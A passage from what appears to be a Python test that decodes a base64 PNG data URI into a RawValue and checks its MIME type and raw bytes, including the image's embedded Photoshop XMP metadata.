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\u003d\u003d' # noqa: E501
r = RawValue(data)
assert r.type == 'image/png'
assert r.value == b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\xfc\x00\x00\x00\xfc\x08\x06\x00\x00\x00S\xab\xc9g\x00\x00\x00\tpHYs\x00\x00\x0b\x13\x00\x00\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x05 iTXtXML:com.adobe.xmp\x00\x00\x00\x00\x00<?xpacket begin="\xef\xbb\xbf" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Macintosh)" xmp:CreateDate="2018-08-17T14:17:50-04:00" xmp:ModifyDate="2018-08-20T07:38:23-04:00" xmp:MetadataDate="2018-08-20T07:38:23-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1992c99c-613c-4035-a37e-84e3d01f4736" xmpMM:DocumentID="xmp.did:1992c99c-613c-4035-a37e-84e3d01f4736" xmpMM:OriginalDocumentID="xmp.did:1992c99c-613c-4035-a37e-84e3d01f4736"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:1992c99c-613c-4035-a37e-84e3d01f4736" stEvt:when="2018-08-17T14:17:50-04:00" stEvt:softwareAgent="Adobe Photoshop CC 2018 (Macintosh)"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>ft\x10\xb8\x00\x004\xe6IDATx\x9c\xed\x9dwx\x14\xd5\xfa\xc7?\xb3%\x9b\x90\x04\x12\x08\x89\xf4\x04\x10P\xaaT\x05A\xa9rQ\x04n x\x01\x95+\x82\x88\x15D\xae\xca\xcf. 
\xa8Xh\xd7\x8a"6\x90\xab\x88\x05\x11\x10\x94+U\xa4\xa8\x14C\xef\xe9@\xeanv\xe7\xf7\xc7\x88\x17\xd2vvwfwv\xf7|\x9eg\x1ee\xf3\x9es\xdel\xf6\xbbs\xe6\x9c\xf7\xbc\xaf$\xcb2\x02\x81 <0\x05\xda\x01\x81@\xe0?\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#\x84\xe0\x05\x820B\x08^ \x08#,\xee\x0c$I\xf2\x87\x1f\xe1\x82\x05H\x06R\x80\x1a@,\x10\xf3\xe7\x7f\x01\n.\xbaN\x01\x87\x81\xe3@\xa9\x9f\xfd\x14\x84\x08e3Z\xb9\x15\xbc\xc0k"\x81\xab\x81\xeb\x81\x0e@3\x14\xa1[=\xec\xc7\t\x1c\x05\xb6\x03[\x81-\x7f^\x05Z9*\x08#dY\xae\xf2\x12xD\n\xf0\x18\xb0\x1e(\x06d\x9d\xae\x12\xe0[\xe0\xbe?\xc7\x14\x08*\xa4\x9c\x9e\x85\xe0}&\x01\xb8\x07\xf8\t\xfd\x04\xee\xee\xfa/\xf0O Z\xe7\xdfU\x10d\x08\xc1kGc`\x1ePH\xe0\x84^\xf6:\x07\xcc\x01\x1a\xe8\xf8{\x0b\x82\x08!x\xdfi\t|\x84\xb2\x90\x16h\x81Wv\xd9\x81\xb7\x80&:\xbd\x07\x82 A\x08\xde{\xe2\x80W\x01\x07\x81\x17\xb4\xda\xab\x04\x98\x89\xb2\x13 \x08C\x84\xe0=G\x02\xc6\x02\x99\x04^\xc0\xde^\'\x81\x11Z\xbf1\x02\xe3#\x04\xef\x19I\xc0J\x02/X\xad\xae\xa5@MM\xdf!\x81\xa1)\xabg\xc9\x9d\xa8\xc38\xf0\xe6o\xc0\xbb@\xa2\x96\x9dFGG\x93\x9c\x9cL\xbdz\xf5\x88\x89\x89\xa1Z\xb5jDG+\x8b\xebEEE\x14\x15\x15\x91\x93\x93\xc3\x89\x13\'8y\xf2$\xe7\xce\x9d\xd3rxP\xee\xf6\xb7\x01k\xb4\xeeX`<\xca\xea[\x08\xbe<\x120\rx\xe4\xcf\xff\xf7\x1a\xab\xd5J\x9b6m\xe8\xdc\xb93\x9d:u\xa2Y\xb3f$$$x\xd4\xc7\xa9S\xa7\xd8\xb2e\x0b[\xb6la\xd3\xa6M\x9c8q\xc2\x17\x97.P\n\x8c\x03\x16j\xd1\x99\xc0\xb8\x08\xc1WM\x04\xca]\xfd\x1f\xdev`\xb1X\xe8\xde\xbd;7\xddt\x13\xbdz\xf5"**J3\xe7\x00N\x9e<\xc9\xe6\xcd\x9b\xf9\xfc\xf3\xcf\xd9\xbcy\xb3\xaf\xdd=\x06\xcc\xd0\xc0-\x81A\x11\x82\xaf\x9c8\xe0s\xe0:o\x1a\'$$p\xdbm\xb7\x91\x96\x96F\\\\\x9c\x86nU\xce\xbe}\xfbX\xb4h\x11+V\xac\xc0n\xb7{\xdb\xcd\x1c\xe0A\xc0\xa5\x99c\x02\xc3 
\x04_1q\xc0\xf7@;O\x1b^v\xd9eL\x980\x81\xc1\x83\x07\x13\x11\x11\xa1\xb5_\xaa\xc8\xcd\xcde\xc9\x92%,Z\xb4\x88\xec\xeclo\xbaX\x02\xdc\x8a\xb2\x7f/\x08!\x84\xe0\xcb\x13\r\xac\x02\xbaz\xd2\xc8f\xb31f\xcc\x18\xc6\x8e\x1d\xab\xf9\xb4\xdd[\xce\x9e=\xcb\xacY\xb3X\xb6l\x997\xcd\xd7\x027\x01E\xdaz%\x08$B\xf0\x97\x12\x01|\t\xf4\xf5\xa4Q\x97.]\x98>}:\xf5\xea\xd5\xd3\xc7+\x1f\xd9\xb4i\x13\x8f?\xfe8\xc7\x8e\x1d\xf3\xb4\xe9\x7f\x80a\x88\xe9}\xc8 \x04\x7f)\x8bP\xa6\xb2\xaa\xb0X,\xdc\x7f\xff\xfd\xdcy\xe7\x9d\x98L\xc6\xce\x1dR\\\\\xcc\x9c9sX\xb8p!.\x97G\xfa}\t\x98\xac\x93[\x02?#\x04\xff?\xc6\x03\x0b\xd4\x1a\xd7\xacY\x93\xf9\xf3\xe7\xd3\xae];\xfd<\xd2\x815k\xd60i\xd2$JJJ<i6\x06xG\'\x97\x04~D\x08^\xa1\x13\xb0\x01eJ\xef\x96\x94\x94\x14\xde|\xf3M\xea\xd7\xaf\xaf\xafW:\xb1}\xfbv\xc6\x8f\x1f\xefI\x10O!\xd0\x11\xd8\xa3\x9fW\x02\x7f \x04\x0f\xd5\x81\xdd@C5\xc6\xad[\xb7\xe6\xad\xb7\xde\xa2F\x8d\x1a\xe5~\x16\x95\xbd\x95\xa8\xccM`\xb2PX\xbb\x1b\xc5\xf1m4vU;\xd2\xd3\xd3\xb9\xf3\xce;9}\xfa\xb4\xda&\xbb\x80\xce(\x07p\x04A\x8a\x10<\xccEIX\xe1\x96f\xcd\x9a\xf1\xfe\xfb\xefW 